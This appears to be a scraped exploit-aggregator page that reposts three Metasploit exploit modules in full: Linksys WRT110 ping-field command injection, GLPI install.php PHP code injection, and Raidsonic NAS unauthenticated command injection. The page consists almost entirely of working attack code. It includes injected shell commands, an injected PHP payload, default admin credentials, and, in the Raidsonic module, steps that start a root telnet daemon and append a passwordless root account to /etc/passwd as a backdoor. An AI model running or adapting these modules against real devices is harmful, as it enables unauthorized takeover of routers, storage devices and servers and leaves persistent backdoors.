[remote] - Linksys WRT110 Remote Command Execution

### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and terms of use.# http://metasploit.com/##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStagerEcho def initialize(info = {}) super(update_info(info, 'Name' => 'Linksys WRT110 Remote Command Execution', 'Description' => %q{ The Linksys WRT110 consumer router is vulnerable to a command injection exploit in the ping field of the web interface. }, 'Author' => [ 'Craig Young', # Vulnerability discovery 'joev ', # msf module 'juan vazquez' # module help + echo cmd stager ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2013-3568'], ['BID', '61151'], ['URL', 'http://seclists.org/bugtraq/2013/Jul/78'] ], 'DisclosureDate' => 'Jul 12 2013', 'Privileged' => true, 'Platform' => ['linux'], 'Arch' => ARCH_MIPSLE, 'Targets' => [ ['Linux mipsel Payload', { } ] ], 'DefaultTarget' => 0, )) register_options([ OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']), OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']), OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']), OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20]) ], self.class) end def check begin res = send_request_cgi({ 'uri' => '/HNAP1/' }) rescue ::Rex::ConnectionError return Exploit::CheckCode::Safe end if res and res.code == 200 and res.body =~ /WRT110<\/ModelName>/ return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit test_login! execute_cmdstager end # Sends an HTTP request with authorization header to the router # Raises an exception unless the login is successful def test_login! print_status("#{rhost}:#{rport} - Trying to login with #{user}:#{pass}") res = send_auth_request_cgi({ 'uri' => '/', 'method' => 'GET' }) if not res or res.code == 401 or res.code == 404 fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Could not login with #{user}:#{pass}") else print_good("#{rhost}:#{rport} - Successful login #{user}:#{pass}") end end # Run the command on the router def execute_command(cmd, opts) send_auth_request_cgi({ 'uri' => '/ping.cgi', 'method' => 'POST', 'vars_post' => { 'pingstr' => '& ' + cmd } }) Rex.sleep(1) # Give the device a second end # Helper methods def user; datastore['USERNAME']; end def pass; datastore['PASSWORD'] || ''; end def send_auth_request_cgi(opts={}, timeout=nil) timeout ||= datastore['TIMEOUT'] opts.merge!('authorization' => basic_auth(user, pass)) begin send_request_cgi(opts, timeout) rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") end endend

View the original article here

[remote] - GLPI install.php Remote Command Execution

### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and terms of use.# http://metasploit.com/##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # Application database configuration is overwritten include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'GLPI install.php Remote Command Execution', 'Description' => %q{ This module exploits an arbitrary command execution vulnerability in the GLPI 'install.php' script. Users should use this exploit at his own risk, since it's going to overwrite database configuration. }, 'Author' => [ 'Tristan Leiter < research[at]navixia.com >', # Navixia Research Team ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-5696' ], [ 'URL', 'https://www.navixia.com/blog/entry/navixia-finds-critical-vulnerabilities-in-glpi-cve-2013-5696.html' ], [ 'URL', 'http://www.glpi-project.org/forum/viewtopic.php?id=33762' ], ], 'Privileged' => false, 'Platform' => ['php'], 'Payload' => { 'Space' => 4000, 'BadChars' => "#", 'DisableNops' => true, 'Keys' => ['php'] }, 'Arch' => ARCH_PHP, 'Targets' => [[ 'GLPI 0.84 or older', { }]], 'DisclosureDate' => 'Sep 12 2013', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to GLPI', '/glpi/']) ], self.class) end def uri return target_uri.path end def check # Check if the GLPI instance is vulnerable res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'index.php'), }) if not res or res.code != 200 return Exploit::CheckCode::Safe end re = '(version)(\\s+)(.*)(\\s+)(Copyright)' m = Regexp.new(re, Regexp::IGNORECASE) matched = m.match(res.body) if matched and matched[3] =~ /0.(8[0-4].[0-1])|([0-7][0-9].[0-9])/ print_good("Detected Version : #{matched[3]}") return Exploit::CheckCode::Appears elsif matched print_error("Version #{matched[3]} is not vulnerable") end return Exploit::CheckCode::Safe end def exploit print_status("Injecting the payload...") rand_arg = Rex::Text.rand_text_hex(10) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'install/install.php'), 'vars_post' => { 'install' => 'update_1', 'db_host' => 'localhost', 'db_user' => 'root', 'db_pass' => 'root', 'databasename' =>"'; } if(isset($_GET['#{rand_arg}'])){ #{payload.encoded} } /*" } }) unless res and res.code == 200 and res.body =~ /You will update the GLPI database/ print_warning("Unexpected response while injecting the payload, trying to execute anyway...") end print_status("Executing the payload...") send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'index.php'), 'vars_get' => { rand_arg => '1', } }) endend

View the original article here

[remote] - Raidsonic NAS Devices Unauthenticated Remote Command Execution

### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and terms of use.# http://metasploit.com/##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # It's backdooring the remote device include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::CommandShell include Msf::Exploit::FileDropper RESPONSE_PATTERN = "\ 'Raidsonic NAS Devices Unauthenticated Remote Command Execution', 'Description' => %q{ Different Raidsonic NAS devices are vulnerable to OS command injection via the web interface. The vulnerability exists in timeHandler.cgi, which is accessible without authentication. This module has been tested with the versions IB-NAS5220 and IB-NAS4220. Since this module is adding a new user and modifying the inetd daemon configuration, this module is set to ManualRanking and could cause target instability. }, 'Author' => [ 'Michael Messner ', # Vulnerability discovery and Metasploit module 'juan vazquez' # minor help with msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '90221' ], [ 'EDB', '24499' ], [ 'BID', '57958' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-010' ] ], 'DisclosureDate' => 'Feb 04 2013', 'Privileged' => true, 'Platform' => 'unix', 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find', }, }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'Targets' => [ [ 'Automatic', { } ], ], 'DefaultTarget' => 0 )) register_advanced_options( [ OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]), OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]) ], self.class) end def tel_timeout (datastore['TelnetTimeout'] || 10).to_i end def banner_timeout (datastore['TelnetBannerTimeout'] || 25).to_i end def exploit telnet_port = rand(32767) + 32768 print_status("#{rhost}:#{rport} - Telnet port: #{telnet_port}") #first request cmd = "killall inetd" cmd = Rex::Text.uri_encode(cmd) print_status("#{rhost}:#{rport} - sending first request - killing inetd") res = request(cmd) #no server header or something that we could use to get sure the command is executed if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end #second request inetd_cfg = rand_text_alpha(8) cmd = "echo \"#{telnet_port} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) print_status("#{rhost}:#{rport} - sending second request - configure inetd") res = request(cmd) #no server header or something that we could use to get sure the command is executed if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end register_file_for_cleanup("/tmp/#{inetd_cfg}") #third request cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) print_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") res = request(cmd) #no server header or something that we could use to get sure the command is executed if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end #fourth request @user = rand_text_alpha(6) cmd = "echo \"#{@user}::0:0:/:/bin/ash\" >> /etc/passwd" cmd = Rex::Text.uri_encode(cmd) print_status("#{rhost}:#{rport} - sending fourth request - configure user #{@user}") res = request(cmd) #no server header or something that we could use to get sure the command is executed if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...") ctx = { 'Msf' => framework, 'MsfExploit' => self } sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i, 'Context' => ctx }) if sock.nil? fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end add_socket(sock) print_status("#{rhost}:#{rport} - Trying to establish a telnet session...") prompt = negotiate_telnet(sock) if prompt.nil? sock.close fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session") else print_good("#{rhost}:#{rport} - Telnet session successfully established...") end handler(sock) end def request(cmd) uri = '/cgi/time/timeHandler.cgi' begin res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', #not working without setting encode_params to false! 'encode_params' => false, 'vars_post' => { "month" => "#{rand(12)}", "date" => "#{rand(30)}", "year" => "20#{rand(99)}", "hour" => "#{rand(12)}", "minute" => "#{rand(60)}", "ampm" => "PM", "timeZone" => "Amsterdam`#{cmd}`", "ntp_type" => "default", "ntpServer" => "none", "old_date" => " 1 12007", "old_time" => "1210", "old_timeZone" => "Amsterdam", "renew" => "0" } }) return res rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") end end def negotiate_telnet(sock) login = read_telnet(sock, "login: $") if login sock.put("#{@user}\r\n") end return read_telnet(sock, "> $") end def read_telnet(sock, pattern) begin Timeout.timeout(banner_timeout) do while(true) data = sock.get_once(-1, tel_timeout) return nil if not data or data.length == 0 if data =~ /#{pattern}/ return true end end end rescue ::Timeout::Error return nil end endend

View the original article here